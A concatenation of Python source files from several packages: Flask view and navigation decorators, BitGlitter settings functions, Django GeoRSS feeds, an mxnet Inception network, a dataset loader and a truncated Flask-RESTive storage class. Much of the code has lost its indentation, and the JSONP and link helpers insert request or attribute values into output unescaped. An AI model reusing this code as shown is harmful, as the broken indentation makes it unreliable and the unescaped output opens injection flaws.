            get passed to the view as k/V
    ** on other methods that return other types, it doesn't apply
:return:
"""
pkey = "_template_extends__"
def decorator(f):
if inspect.isclass(f):
layout_ = layout or page
extends = kwargs.pop("extends", None)
            if extends and hasattr(extends, pkey):
                inherited = dict(getattr(extends, pkey))
                if "layout" in inherited:
                    layout_ = inherited.pop("layout")
                for k, v in inherited.items():
                    kwargs.setdefault(k, v)
if not layout_:
layout_ = "layout.html"
kwargs.setdefault("brand_name", "")
kwargs["layout"] = layout_
setattr(f, pkey, kwargs)
setattr(f, "base_layout", kwargs.get("layout"))
setattr(f, "template_markup", markup or "html")
f.g(TEMPLATE_CONTEXT=kwargs)
return f
else:
@functools.wraps(f)
def wrap(*args2, **kwargs2):
response = f(*args2, **kwargs2)
if isinstance(response, dict) or response is None:
response = response or {}
if page:
response.setdefault("_template", page)
if layout:
response.setdefault("_layout", layout)
for k, v in kwargs.items():
response.setdefault(k, v)
return response
return wrap
return decorator
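# Hedged sketch of @template in use (commented out; the template paths and
# view names are placeholders):
#
#   @template("layout.html", brand_name="Acme")
#   class Blog(Harambe):
#
#       @template("blog/post.html")
#       def post(self):
#           # the returned dict is rendered with the page/layout applied
#           return {"title": "Hello"}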
# ------------------------------------------------------------------------------
def _normalize_response_tuple(tuple_):
"""
    Helper function to normalize view return values.
    It always returns (dict, status, headers). Missing values will be None.
    For example, it handles cases where tuple_ is
    (dict, status), (dict, headers), (dict, status, headers), or
    (dict, headers, status).
    It assumes that status is an int, so this construction will not work:
    (dict, None, headers) - it doesn't make sense because you would just use
    (dict, headers) if you want to skip the status.
"""
v = tuple_ + (None,) * (3 - len(tuple_))
return v if isinstance(v[1], int) else (v[0], v[2], v[1])
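# For example (all three forms normalize to (dict, status, headers)):
#   ({"a": 1}, 404)                   -> ({"a": 1}, 404, None)
#   ({"a": 1}, {"X-Total": "5"})      -> ({"a": 1}, None, {"X-Total": "5"})
#   ({"a": 1}, {"X-Total": "5"}, 200) -> ({"a": 1}, 200, {"X-Total": "5"})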
__view_parsers = set()
def view_parser(f):
"""
    A simple decorator to register a parser for the data that will be rendered
    :param f:
:return:
"""
__view_parsers.add(f)
return f
def _build_response(data, renderer=None):
"""
Build a response using the renderer from the data
:return:
"""
if isinstance(data, Response) or isinstance(data, BaseResponse):
return data
if not renderer:
raise AttributeError(" Renderer is required")
if isinstance(data, dict) or data is None:
data = {} if data is None else data
for _ in __view_parsers:
data = _(data)
return renderer(data), 200
elif isinstance(data, tuple):
data, status, headers = _normalize_response_tuple(data)
for _ in __view_parsers:
data = _(data)
return renderer(data or {}), status, headers
return data
json_renderer = lambda i, data: _build_response(data, jsonify)
xml_renderer = lambda i, data: _build_response(data, dicttoxml)
def render_json(func):
"""
Decorator to render as JSON
:param func:
:return:
"""
if inspect.isclass(func):
apply_function_to_members(func, render_json)
return func
else:
@functools.wraps(func)
def decorated_view(*args, **kwargs):
data = func(*args, **kwargs)
return _build_response(data, jsonify)
return decorated_view
def render_xml(func):
"""
Decorator to render as XML
:param func:
:return:
"""
if inspect.isclass(func):
apply_function_to_members(func, render_xml)
return func
else:
@functools.wraps(func)
def decorated_view(*args, **kwargs):
data = func(*args, **kwargs)
return _build_response(data, dicttoxml)
return decorated_view
def render_jsonp(func):
"""Wraps JSONified output for JSONP requests.
http://flask.pocoo.org/snippets/79/
"""
@functools.wraps(func)
def decorated_view(*args, **kwargs):
callback = request.args.get('callback', None)
if callback:
data = str(func(*args, **kwargs))
content = str(callback) + '(' + data + ')'
mimetype = 'application/javascript'
return current_app.response_class(content, mimetype=mimetype)
else:
return func(*args, **kwargs)
return decorated_view
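# Example of the render decorators (commented out; `Api` is hypothetical):
#
#   class Api(Harambe):
#
#       @render_json
#       def stats(self):
#           return {"ok": True}        # served as application/json
#
#       @render_xml
#       def stats_xml(self):
#           return {"ok": True}        # serialized with dicttoxml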
# ------------------------------------------------------------------------------
class SiteNavigation(object):
"""
    SiteNavigation is a class decorator to build the page menu while building the endpoints
    Decorator to build navigation menus directly on the methods
    By default it will build the menu of the module, class and method
    If the class is also decorated, it will use the menu _name as the top level _name
:param title: str or function : The menu title
if string, it will just display the text
if function, it will run it each time
:param kwargs: extra options to pass into the menu or to move the menu somewhere else
order int: The order of the menu in the set
        visible (list of bool or callback): To hide and show the menu. Accepts a bool or a
            list of callbacks; each callback must return a bool. The menu is shown
            only when everything evaluates to True, otherwise it is hidden.
** When this menu is inside of a menu set, or has parent, if you want
that page to be activated, but don't want to create a menu link,
for example: a blog read page, set show to False. It will know
the menu set is active
endpoint string: By default the endpoint is built based on the method and class.
When set it will be used instead
        endpoint_kwargs dict: dict of k/v data for endpoint
group_name str: On class menu, it can be used to filter a menu set to display.
If a class is passed, it will try to inherit the group from that class
The args below will allow you to change where the menu is placed.
By default they are set automatically
module_: the module _name. Usually if using another module
class_: the class _name class _name in the module
method_: The method _name, to build endpoint. Changing this will change the url
some other kwargs:
url
target
fa_icon
align_right
show_profile_avatar
show_profile_name
css_class
css_id
position: string - of right or left. By default it's left
            it will position the menu at the specified place
attach_to: list - of full module.Class path to attach the menu to.
by default it will detach the class it is attached to
To reattach it, add the string `self` in the list
:return:
"""
_title_map = {}
def __call__(self, title, **kwargs):
def wrap(f):
if title:
_class = inspect.stack()[1][3]
_is_class = inspect.isclass(f)
kwargs.setdefault("key", _class)
self._push(title=title,
view=f,
class_name=_class,
is_class=_is_class,
**kwargs)
return f
return wrap
def __init__(self):
self.MENU = {}
def add(self, title, obj, **kwargs):
"""
Add a title
:param title: str: The title of the menu
:param obj: class or method
:param kwargs:
:return:
"""
is_class = inspect.isclass(obj)
self._push(title=title,
view=obj,
class_name=obj.im_class.__name__ if not is_class else obj.__name__,
is_class=is_class,
**kwargs)
def clear(self):
self.MENU = {}
def _push(self, title, view, class_name, is_class, **kwargs):
""" Push nav data stack """
module_name = view.__module__
method_name = view.__name__
_endpoint = build_endpoint_route_name(view, "index" if is_class else method_name, class_name)
endpoint = kwargs.pop("endpoint", _endpoint)
kwargs.setdefault("endpoint_kwargs", {})
order = kwargs.pop("order", 0)
# visible: accepts a bool or list of callback to execute
visible = kwargs.pop("visible", [True])
if not isinstance(visible, list):
visible = [visible]
kwargs["view"] = view
kwargs["visible"] = visible
kwargs["active"] = False
kwargs["key"] = class_name
if is_class: # class menu
kwargs["endpoint"] = endpoint
kwargs["group_name"] = kwargs.pop("group_name", None)
kwargs["has_subnav"] = True
else:
kwargs["has_subnav"] = False
kwargs.update({
"order": order,
"has_subnav": False,
"title": title,
"endpoint": endpoint,
})
self._title_map[endpoint] = title
path = "%s.%s" % (module_name, method_name if is_class else class_name)
attach_to = kwargs.pop("attach_to", [])
        if attach_to:
            if "self" in attach_to:
                attach_to.remove("self")
                attach_to.append(path)
        else:
            attach_to.append(path)
for path in attach_to:
if path not in self.MENU:
self.MENU[path] = {
"title": None,
"endpoint": None,
"endpoint_kwargs": {},
"order": None,
"subnav": [],
"kwargs": {}
}
if is_class: # class menu
self.MENU[path]["title"] = title
self.MENU[path]["order"] = order
self.MENU[path]["kwargs"] = kwargs
else: # sub menu
self.MENU[path]["subnav"].append(kwargs)
def _get_title(self, title):
"""Title can also be a function"""
return title() if hasattr(title, '__call__') else title
def _test_visibility(self, shows):
if isinstance(shows, bool):
return shows
elif not isinstance(shows, list):
shows = [shows]
return all([x() if hasattr(x, "__call__") else x for x in shows])
def get(self, cls):
key = self.get_key(cls)
return self.MENU[key]
def get_key(self, cls):
"""
Return the string key of the class
:param cls: class
:return: str
"""
return "%s.%s" % (cls.__module__, cls.__name__)
def render(self):
""" Render the menu into a sorted by order multi dict """
menu_list = []
menu_index = 0
for _, menu in copy.deepcopy(self.MENU).items():
subnav = []
menu["kwargs"]["_id"] = str(menu_index)
menu["kwargs"]["active"] = False
if "visible" in menu["kwargs"]:
menu["kwargs"]["visible"] = self._test_visibility(menu["kwargs"]["visible"])
for s in menu["subnav"]:
if s["title"]:
s["title"] = self._get_title(s["title"])
if s["endpoint"] == request.endpoint:
s["active"] = True
menu["kwargs"]["active"] = True
s["visible"] = self._test_visibility(s["visible"])
menu_index += 1
s["_id"] = str(menu_index)
subnav.append(s)
_kwargs = menu["kwargs"]
if menu["title"]:
_kwargs.update({
"subnav": self._sort(subnav),
"order": menu["order"],
"title": self._get_title(menu["title"])
})
menu_list.append(_kwargs)
else:
menu_list += subnav
menu_index += 1
return self._sort(menu_list)
def _sort(self, items):
""" Reorder the nav by key order """
return sorted(items, key=lambda s: s["order"])
def init_app(self, app):
def link_for(endpoint, props={}, **kwargs):
url = url_for(endpoint, **kwargs)
title = self._title_map.get(endpoint, "")
props = " ".join(["%s='%s'" % (k, v) for k, v in props.items()])
a = "<a href='{url}' {props}>{title}</a>".format(title=title,
url=url,
props=props)
return Markup(a)
@app.context_processor
def _():
return dict(link_for=link_for)
@app.before_request
def p(*args, **kwargs):
""" Will always run the menu """
if request.endpoint not in ["static", None]:
setattr(g, "__SITENAV__", nav_title.render())
nav_title = SiteNavigation()
init_app(nav_title.init_app)
# ------------------------------------------------------------------------------
def cors(*args, **kwargs):
"""
A wrapper around flask-cors cross_origin, to also act on classes
**An extra note about cors, a response must be available before the
cors is applied. Dynamic return is applied after the fact, so use the
decorators, render_json, render_xml, or return self.render() for txt/html
ie:
@cors()
class Index(Harambe):
def index(self):
return self.render()
@render_json
def json(self):
return {}
class Index2(Harambe):
def index(self):
return self.render()
@cors()
@render_json
def json(self):
return {}
:return:
"""
def decorator(fn):
cors_fn = flask_cors.cross_origin(automatic_options=False, *args, **kwargs)
if inspect.isclass(fn):
apply_function_to_members(fn, cors_fn)
else:
return cors_fn(fn)
return fn
return decorator
def headers(params={}):
"""This decorator adds the headers passed in to the response
http://flask.pocoo.org/snippets/100/
"""
def decorator(f):
if inspect.isclass(f):
h = headers(params)
apply_function_to_members(f, h)
return f
@functools.wraps(f)
def decorated_function(*args, **kwargs):
resp = make_response(f(*args, **kwargs))
h = resp.headers
for header, value in params.items():
h[header] = value
return resp
return decorated_function
return decorator
def noindex(f):
"""This decorator passes X-Robots-Tag: noindex
http://flask.pocoo.org/snippets/100/
"""
return headers({'X-Robots-Tag': 'noindex'})(f)
# ------------------------------------------------------------------------------
"""
Signals
Signals allow you to connect receivers to a function and react before and after it executes
Usage
1. Emitter.
Decorate your function with @emit_signal.
        That function itself will turn into a decorator that you can use to attach
        receivers to be dispatched pre and post execution of the function
@emit_signal()
def login(*a, **kw):
# Run the function
return
@emit_signal()
    def logout(your_fn_args):
# run function
return
2. Receivers.
The function that was emitted now become signal decorator to use on function
that will dispatch pre and post action. The pre and post function will
be executed before and after the signal function runs respectively.
@login.pre.connect
def my_pre_login(*a, **kw):
# *a, **kw are the same arguments passed to the function
print("This will run before the signal is executed")
@login.post.connect
def my_post_login(sender, emitter, result, **kw):
        # sender: the name of the function
# emitter
# result: the result of the function
# **kw
print("This will run after the signal is executed")
3. Send Signal
Now sending a signal is a matter of running the function.
ie:
login(username, password)
That's it!
"""
__signals_namespace = blinker.Namespace()
def emit_signal(sender=None, namespace=None):
"""
@emit_signal
A decorator to mark a method or function as a signal emitter
:param sender: string to be the sender.
If empty, it will use the function __module__+__fn_name,
or method __module__+__class_name__+__fn_name__
:param namespace: The namespace. If None, it will use the global namespace
:return:
"""
if not namespace:
namespace = __signals_namespace
def decorator(fn):
fname = sender
if not fname:
fnargs = inspect.getargspec(fn).args
fname = fn.__module__
if 'self' in fnargs or 'cls' in fnargs:
caller = inspect.currentframe().f_back
fname += "_" + caller.f_code.co_name
fname += "__" + fn.__name__
fn.pre = namespace.signal('pre_%s' % fname)
fn.post = namespace.signal('post_%s' % fname)
def send(action, *a, **kw):
sig_name = "%s_%s" % (action, fname)
result = kw.pop("result", None)
kw.update(inspect.getcallargs(fn, *a, **kw))
            sendkw = dict(kw)
sendkw["emitter"] = sendkw.pop('self', sendkw.pop('cls', kw.get('self', kw.get('cls', fn))))
if action == 'post':
sendkw["result"] = result
namespace.signal(sig_name).send(fname, **sendkw)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
send('pre', *args, **kwargs)
result = fn(*args, **kwargs)
kwargs["result"] = result
send('post', *args, **kwargs)
return result
return wrapper
return decorator | PypiClean |
/BitGlitter-2.0.0.tar.gz/BitGlitter-2.0.0/bitglitter/config/configfunctions.py | from bitglitter.config.config import session
from bitglitter.config.configmodels import Config, Constants, Statistics
from bitglitter.config.defaultdbdata import load_default_db_data
from bitglitter.config.palettemodels import Palette
from bitglitter.config.presetmodels import Preset
from bitglitter.config.readmodels.streamread import StreamRead
from bitglitter.config.readmodels.readmodels import StreamDataProgress, StreamFile, StreamFrame, StreamSHA256Blacklist
def remove_session():
"""Resets persistent data to factory default settings."""
model_list = [Config, Constants, Palette, Preset, Statistics, StreamDataProgress, StreamFile, StreamFrame,
StreamRead, StreamSHA256Blacklist]
for model in model_list:
session.query(model).delete()
session.commit()
load_default_db_data()
def return_settings():
config = session.query(Config).first()
return {'read_path': config.read_path, 'read_bad_frame_strikes':
            config.read_bad_frame_strikes, 'disable_bad_frame_strikes': config.disable_bad_frame_strikes, 'write_path':
config.write_path, 'log_txt_path': config.log_txt_dir, 'log_output': config.log_output,
'maximum_cpu_cores': config.maximum_cpu_cores, 'save_statistics': config.save_statistics,
'output_stream_title': config.output_stream_title, 'MAX_SUPPORTED_CPU_CORES':
config.MAX_SUPPORTED_CPU_CORES, 'logging_level': config.logging_level}
def update_settings(read_path=None, read_bad_frame_strikes=None, disable_bad_frame_strikes=None,
write_path=None, log_txt_path=None, log_output=None, logging_level=None, maximum_cpu_cores=None,
save_statistics=None, output_stream_title=None):
config = session.query(Config).first()
if read_path:
config.read_path = read_path
if read_bad_frame_strikes:
config.read_bad_frame_strikes = read_bad_frame_strikes
if disable_bad_frame_strikes:
config.disable_bad_frame_strikes = disable_bad_frame_strikes
if write_path:
config.write_path = write_path
if log_txt_path:
config.log_txt_dir = log_txt_path
if log_output:
config.log_output = log_output
    if logging_level:
config.logging_level = logging_level
if maximum_cpu_cores:
config.maximum_cpu_cores = maximum_cpu_cores
if save_statistics:
config.save_statistics = save_statistics
if output_stream_title:
config.output_stream_title = output_stream_title
config.save()
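# Illustrative call (commented out; only the keyword arguments that are
# provided get persisted, everything else keeps its current value):
#
#   update_settings(write_path="/tmp/bitglitter", maximum_cpu_cores=4)
#   current = return_settings()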
def output_stats():
"""Returns a dictionary object containing read and write statistics."""
stats = session.query(Statistics).first()
return stats.return_stats()
def clear_stats():
"""Resets all write and read values back to zero."""
stats = session.query(Statistics).first()
stats.clear_stats()
def write_stats_update(blocks, frames, data):
"""Internal function to update stats after rendering completes, along with read update below."""
stats = session.query(Statistics).first()
stats.write_update(blocks, frames, data)
def read_stats_update(blocks, frames, data):
stats = session.query(Statistics).first()
stats.read_update(blocks, frames, data) | PypiClean |
/Django-4.2.4.tar.gz/Django-4.2.4/django/contrib/gis/feeds.py | from django.contrib.syndication.views import Feed as BaseFeed
from django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed
class GeoFeedMixin:
"""
This mixin provides the necessary routines for SyndicationFeed subclasses
to produce simple GeoRSS or W3C Geo elements.
"""
def georss_coords(self, coords):
"""
In GeoRSS coordinate pairs are ordered by lat/lon and separated by
a single white space. Given a tuple of coordinates, return a string
GeoRSS representation.
"""
return " ".join("%f %f" % (coord[1], coord[0]) for coord in coords)
def add_georss_point(self, handler, coords, w3c_geo=False):
"""
Adds a GeoRSS point with the given coords using the given handler.
Handles the differences between simple GeoRSS and the more popular
W3C Geo specification.
"""
if w3c_geo:
lon, lat = coords[:2]
handler.addQuickElement("geo:lat", "%f" % lat)
handler.addQuickElement("geo:lon", "%f" % lon)
else:
handler.addQuickElement("georss:point", self.georss_coords((coords,)))
def add_georss_element(self, handler, item, w3c_geo=False):
"""Add a GeoRSS XML element using the given item and handler."""
# Getting the Geometry object.
geom = item.get("geometry")
if geom is not None:
if isinstance(geom, (list, tuple)):
# Special case if a tuple/list was passed in. The tuple may be
# a point or a box
box_coords = None
if isinstance(geom[0], (list, tuple)):
# Box: ( (X0, Y0), (X1, Y1) )
if len(geom) == 2:
box_coords = geom
else:
raise ValueError("Only should be two sets of coordinates.")
else:
if len(geom) == 2:
# Point: (X, Y)
self.add_georss_point(handler, geom, w3c_geo=w3c_geo)
elif len(geom) == 4:
# Box: (X0, Y0, X1, Y1)
box_coords = (geom[:2], geom[2:])
else:
raise ValueError("Only should be 2 or 4 numeric elements.")
# If a GeoRSS box was given via tuple.
if box_coords is not None:
if w3c_geo:
raise ValueError(
"Cannot use simple GeoRSS box in W3C Geo feeds."
)
handler.addQuickElement(
"georss:box", self.georss_coords(box_coords)
)
else:
# Getting the lowercase geometry type.
gtype = str(geom.geom_type).lower()
if gtype == "point":
self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)
else:
if w3c_geo:
raise ValueError("W3C Geo only supports Point geometries.")
# For formatting consistent w/the GeoRSS simple standard:
# http://georss.org/1.0#simple
if gtype in ("linestring", "linearring"):
handler.addQuickElement(
"georss:line", self.georss_coords(geom.coords)
)
elif gtype in ("polygon",):
# Only support the exterior ring.
handler.addQuickElement(
"georss:polygon", self.georss_coords(geom[0].coords)
)
else:
raise ValueError(
'Geometry type "%s" not supported.' % geom.geom_type
)
# ### SyndicationFeed subclasses ###
class GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super().rss_attributes()
attrs["xmlns:georss"] = "http://www.georss.org/georss"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super().add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class GeoAtom1Feed(Atom1Feed, GeoFeedMixin):
def root_attributes(self):
attrs = super().root_attributes()
attrs["xmlns:georss"] = "http://www.georss.org/georss"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super().add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super().rss_attributes()
attrs["xmlns:geo"] = "http://www.w3.org/2003/01/geo/wgs84_pos#"
return attrs
def add_item_elements(self, handler, item):
super().add_item_elements(handler, item)
self.add_georss_element(handler, item, w3c_geo=True)
def add_root_elements(self, handler):
super().add_root_elements(handler)
self.add_georss_element(handler, self.feed, w3c_geo=True)
# ### Feed subclass ###
class Feed(BaseFeed):
"""
This is a subclass of the `Feed` from `django.contrib.syndication`.
    This allows users to define `geometry(obj)` and/or `item_geometry(item)`
    methods on their own subclasses so that geo-referenced information may be
    placed in the feed.
"""
feed_type = GeoRSSFeed
def feed_extra_kwargs(self, obj):
return {"geometry": self._get_dynamic_attr("geometry", obj)}
def item_extra_kwargs(self, item):
return {"geometry": self._get_dynamic_attr("item_geometry", item)} | PypiClean |
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/mxnet/builtin_symbols/symbol_inception_bn.py | from .. import symbol
def ConvFactory(data, num_filter, kernel, stride=(1,1), pad=(0, 0), name=None, suffix=''):
conv = symbol.Convolution(data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, name='conv_%s%s' %(name, suffix))
bn = symbol.BatchNorm(data=conv, name='bn_%s%s' %(name, suffix))
act = symbol.Activation(data=bn, act_type='relu', name='relu_%s%s' %(name, suffix))
return act
def InceptionFactoryA(data, num_1x1, num_3x3red, num_3x3, num_d3x3red, num_d3x3, pool, proj, name):
# 1x1
c1x1 = ConvFactory(data=data, num_filter=num_1x1, kernel=(1, 1), name=('%s_1x1' % name))
# 3x3 reduce + 3x3
c3x3r = ConvFactory(data=data, num_filter=num_3x3red, kernel=(1, 1), name=('%s_3x3' % name), suffix='_reduce')
c3x3 = ConvFactory(data=c3x3r, num_filter=num_3x3, kernel=(3, 3), pad=(1, 1), name=('%s_3x3' % name))
# double 3x3 reduce + double 3x3
cd3x3r = ConvFactory(data=data, num_filter=num_d3x3red, kernel=(1, 1), name=('%s_double_3x3' % name), suffix='_reduce')
cd3x3 = ConvFactory(data=cd3x3r, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), name=('%s_double_3x3_0' % name))
cd3x3 = ConvFactory(data=cd3x3, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), name=('%s_double_3x3_1' % name))
# pool + proj
pooling = symbol.Pooling(data=data, kernel=(3, 3), stride=(1, 1), pad=(1, 1), pool_type=pool, name=('%s_pool_%s_pool' % (pool, name)))
cproj = ConvFactory(data=pooling, num_filter=proj, kernel=(1, 1), name=('%s_proj' % name))
# concat
concat = symbol.Concat(*[c1x1, c3x3, cd3x3, cproj], name='ch_concat_%s_chconcat' % name)
return concat
def InceptionFactoryB(data, num_3x3red, num_3x3, num_d3x3red, num_d3x3, name):
# 3x3 reduce + 3x3
c3x3r = ConvFactory(data=data, num_filter=num_3x3red, kernel=(1, 1), name=('%s_3x3' % name), suffix='_reduce')
c3x3 = ConvFactory(data=c3x3r, num_filter=num_3x3, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name=('%s_3x3' % name))
# double 3x3 reduce + double 3x3
cd3x3r = ConvFactory(data=data, num_filter=num_d3x3red, kernel=(1, 1), name=('%s_double_3x3' % name), suffix='_reduce')
cd3x3 = ConvFactory(data=cd3x3r, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), stride=(1, 1), name=('%s_double_3x3_0' % name))
cd3x3 = ConvFactory(data=cd3x3, num_filter=num_d3x3, kernel=(3, 3), pad=(1, 1), stride=(2, 2), name=('%s_double_3x3_1' % name))
# pool + proj
pooling = symbol.Pooling(data=data, kernel=(3, 3), stride=(2, 2), pool_type="max", name=('max_pool_%s_pool' % name))
# concat
concat = symbol.Concat(*[c3x3, cd3x3, pooling], name='ch_concat_%s_chconcat' % name)
return concat
def get_symbol(num_classes=1000):
"""
Return the "BN-Inception" architecture for image classification
The network is suitable for images of size around 224 x 224
Parameters
----------
num_classes : int, optional
        Number of classes in the output layer.
References
----------
- Sergey Ioffe and Christian Szegedy. Batch normalization: Accelerating deep
network training by reducing internal covariate shift. arXiv preprint
arXiv:1502.03167, 2015.
"""
# data
data = symbol.Variable(name="data")
# stage 1
conv1 = ConvFactory(data=data, num_filter=64, kernel=(7, 7), stride=(2, 2), pad=(3, 3), name='conv1')
pool1 = symbol.Pooling(data=conv1, kernel=(3, 3), stride=(2, 2), name='pool1', pool_type='max')
# stage 2
conv2red = ConvFactory(data=pool1, num_filter=64, kernel=(1, 1), stride=(1, 1), name='conv2red')
conv2 = ConvFactory(data=conv2red, num_filter=192, kernel=(3, 3), stride=(1, 1), pad=(1, 1), name='conv2')
pool2 = symbol.Pooling(data=conv2, kernel=(3, 3), stride=(2, 2), name='pool2', pool_type='max')
    # stage 3
in3a = InceptionFactoryA(pool2, 64, 64, 64, 64, 96, "avg", 32, '3a')
in3b = InceptionFactoryA(in3a, 64, 64, 96, 64, 96, "avg", 64, '3b')
in3c = InceptionFactoryB(in3b, 128, 160, 64, 96, '3c')
    # stage 4
in4a = InceptionFactoryA(in3c, 224, 64, 96, 96, 128, "avg", 128, '4a')
in4b = InceptionFactoryA(in4a, 192, 96, 128, 96, 128, "avg", 128, '4b')
in4c = InceptionFactoryA(in4b, 160, 128, 160, 128, 160, "avg", 128, '4c')
in4d = InceptionFactoryA(in4c, 96, 128, 192, 160, 192, "avg", 128, '4d')
in4e = InceptionFactoryB(in4d, 128, 192, 192, 256, '4e')
    # stage 5
in5a = InceptionFactoryA(in4e, 352, 192, 320, 160, 224, "avg", 128, '5a')
in5b = InceptionFactoryA(in5a, 352, 192, 320, 192, 224, "max", 128, '5b')
# global avg pooling
avg = symbol.Pooling(data=in5b, kernel=(7, 7), stride=(1, 1), name="global_pool", pool_type='avg')
# linear classifier
flatten = symbol.Flatten(data=avg, name='flatten')
fc1 = symbol.FullyConnected(data=flatten, num_hidden=num_classes, name='fc1')
softmax = symbol.SoftmaxOutput(data=fc1, name='softmax')
return softmax | PypiClean |
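if __name__ == "__main__":
    # Illustrative smoke test; assumes the standard mxnet Symbol API
    # (list_arguments) is exposed by the bundled `symbol` module.
    net = get_symbol(num_classes=1000)
    print(net.list_arguments()[:5])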
/observations-0.1.4.tar.gz/observations-0.1.4/observations/r/salinity.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def salinity(path):
"""Water Salinity and River Discharge
The `salinity` data frame has 28 rows and 4 columns.
Biweekly averages of the water salinity and river discharge in Pamlico
Sound, North Carolina were recorded between the years 1972 and 1977. The
data in this set consists only of those measurements in March, April and
May.
This data frame contains the following columns:
`sal`
The average salinity of the water over two weeks.
`lag`
The average salinity of the water lagged two weeks. Since only
spring is used, the value of `lag` is not always equal to the
previous value of `sal`.
`trend`
A factor indicating in which of the 6 biweekly periods between March
and May, the observations were taken. The levels of the factor are
from 0 to 5 with 0 being the first two weeks in March.
`dis`
The amount of river discharge during the two weeks for which `sal`
is the average salinity.
The data were obtained from
Ruppert, D. and Carroll, R.J. (1980) Trimmed least squares estimation in
the linear model. *Journal of the American Statistical Association*,
**75**, 828–838.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `salinity.csv`.
Returns:
Tuple of np.ndarray `x_train` with 28 rows and 4 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'salinity.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/boot/salinity.csv'
maybe_download_and_extract(path, url,
save_file_name='salinity.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata | PypiClean |
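if __name__ == "__main__":
    # Illustrative usage: downloads the CSV into "~/data" on first call.
    x_train, metadata = salinity("~/data")
    print(x_train.shape)              # expected (28, 4)
    print(list(metadata["columns"]))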
/Flask-RESTive-0.0.3.tar.gz/Flask-RESTive-0.0.3/flask_restive/services.py | from __future__ import unicode_literals
from flask import current_app
from flask_restive.schema_opts import PrimaryKeySchemaOpts
from flask_restive.params import SliceParams
from flask_restive.exceptions import DoesNotExist
class Service(object):
"""
The abstract service class.
Provides methods to initialize and finalize the service session:
- open
- close
Can be used in with statement also:
with Service() as service:
storage.do_something()
"""
OPTIONS_CLASS = PrimaryKeySchemaOpts
opts = None
app = None
def __init__(self, *args, **kwargs):
super(Service, self).__init__(*args, **kwargs)
meta = self.__class__.__dict__.get('Meta')
setattr(self.__class__, 'opts', self.OPTIONS_CLASS(meta))
setattr(self.__class__, 'app', current_app)
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close(exc_val)
return exc_type is None
def open(self):
raise NotImplementedError
def close(self, exception=None):
raise NotImplementedError
def wrap_data(self, *args, **kwargs):
"""
This method should be called for each item
returned by service methods.
:param args: the first argument is data
returned by service method
:param kwargs: key-value attributes for
manual creation
:return: wrapped data
:rtype: flask_restive.params.Params
"""
return self.opts.wrap_data(*args, **kwargs)
class Storage(Service):
"""
The abstract base storage class. Provides methods to manage data:
- get_item
- get_count
- get_list
- create_item
- create_list
- update_item
- update_list
- delete_list
Provides methods to initialize and finalize the storage session:
- open
- close
Can be used in with statement also:
with Storage() as storage:
filter_params = Params(id=1, primary_key_fields=('id',))
item = storage.get_item(filter_params=filter_params)
"""
def get_item(self, filter_params, **kwargs):
"""
Get one item by filter. Filter should contain primary key.
The found item should be wrapped in Params class and
should contain primary key.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options, to be forwarded to get_list method
:return: found item
:rtype: flask_restive.params.Params
"""
items = self.get_list(filter_params=filter_params,
slice_params=SliceParams(limit=1), **kwargs)
if not items:
raise DoesNotExist
assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def get_count(self, filter_params=None, **kwargs):
"""
Get count of items by filter.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param kwargs: options
:return: count of found items
:rtype: int
"""
raise NotImplementedError
def get_list(self, filter_params=None, slice_params=None,
sorting_params=None, **kwargs):
"""
Get list of items by filter, can be sliced and sorted.
Each of found item should be wrapped in Params class and
should contain primary key.
:param filter_params: filtering parameters
:type filter_params: flask_restive.params.Params
:param slice_params: slice (paging) parameters
:type slice_params: flask_restive.params.SliceParams
:param sorting_params: sorting parameters
:type sorting_params: flask_restive.params.SortingParams
:param kwargs: options
:return: found items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def create_item(self, data_params, **kwargs):
"""
Create one item. Data params should contain primary key.
The created item should be wrapped in Params class and
should contain primary key.
:param data_params: item data
:type data_params: flask_restive.params.Params
:param kwargs: options
:return: created item
:rtype: flask_restive.params.Params
"""
items = self.create_list(data_params=[data_params], **kwargs)
assert len(items) == 1, 'Too many items to unpack.'
return items[0]
def create_list(self, data_params, **kwargs):
"""
Create list of items. Each item should contain primary key.
Each of created item should be wrapped in Params class and
should contain primary key.
:param data_params: items data to create,
list of flask_restive.params.Params
:type data_params: list
:param kwargs: options
:return: created items, list of flask_restive.params.Params
:rtype: list
"""
raise NotImplementedError
def update_item(self, data_params, **kwargs):
"""
Update one item. Data params should contain primary key.
The rest of item parameters are values to update.
The updated item should be wrapped in Params class and
should contain primary key.
:param data_params: item to update
:type data_params: flask_restive.params.Params
:param kwargs: options
:return: updated item
:rtype: flask_restive.params.Params
"""
items = self.update_list(data_params=[data_params], **kwargs)
